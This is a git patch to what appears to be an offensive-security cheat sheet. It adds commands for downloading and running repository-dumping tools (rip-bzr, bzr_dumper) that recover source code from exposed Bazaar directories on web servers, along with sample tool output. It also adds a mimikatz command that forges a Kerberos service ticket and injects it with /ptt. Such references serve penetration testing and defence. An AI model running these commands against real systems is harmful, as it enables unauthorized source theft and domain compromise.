From e5090f2797cea95875248385c1bcbedc38ead10f Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Fri, 15 Mar 2019 23:27:14 +0100
Subject: [PATCH] Bazaar - version control system

---
 Insecure Source Code Management/README.md     | 37 +++++++++++++++++++
 .../Active Directory Attack.md                |  1 +
 2 files changed, 38 insertions(+)

diff --git a/Insecure Source Code Management/README.md b/Insecure Source Code Management/README.md
index 755f868..40fed0b 100644
--- a/Insecure Source Code Management/README.md	
+++ b/Insecure Source Code Management/README.md	
@@ -11,6 +11,9 @@
 - [SVN - Source code management](#svn---source-code-management)
   - [SVN example (Wordpress)](#svn-example-wordpress)
   - [Automatic way : svn-extractor](#automatic-way--svn-extractor)
+- [BAZAAR - Source code management](#bazaar---source-code-management)
+  - [Automatic way : rip-bzr](#automatic-way--rip-bzr)
+  - [Automatic way : bzr_dumper](#automatic-way--bzr_dumper)
 
 ## GIT - Source code management
 
@@ -189,6 +192,40 @@ git clone https://github.com/anantshri/svn-extractor.git
 python svn-extractor.py –url "url with .svn available"
 ```
 
+## BAZAAR - Source code management
+
+### Automatic way : rip-bzr.pl
+
+```powershell
+wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl
+docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-git.pl -v -u  
+```
+
+### Automatic way : bzr_dumper
+
+```powershell
+git clone https://github.com/SeahunOh/bzr_dumper
+python3 dumper.py -u "http://127.0.0.1:5000/" -o source
+Created a standalone tree (format: 2a)                                                                                                                                                       
+[!] Target : http://127.0.0.1:5000/
+[+] Start.
+[+] GET repository/pack-names
+[+] GET README
+[+] GET checkout/dirstate
+[+] GET checkout/views
+[+] GET branch/branch.conf
+[+] GET branch/format
+[+] GET branch/last-revision
+[+] GET branch/tag
+[+] GET b'154411f0f33adc3ff8cfb3d34209cbd1'
+[*] Finish
+
+$ bzr revert
+ N  application.py
+ N  database.py
+ N  static/   
+```
+
 ## References
 
 - [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index d0b24d9..1847667 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -343,6 +343,7 @@ Forging a TGS require machine accound password (key) from the KDC
 ```powershell
 Create a ticket for the service
 kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE
+/kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt
 
 Then use the same steps as a Golden ticket
 misc::convert ccache ticket.kirbi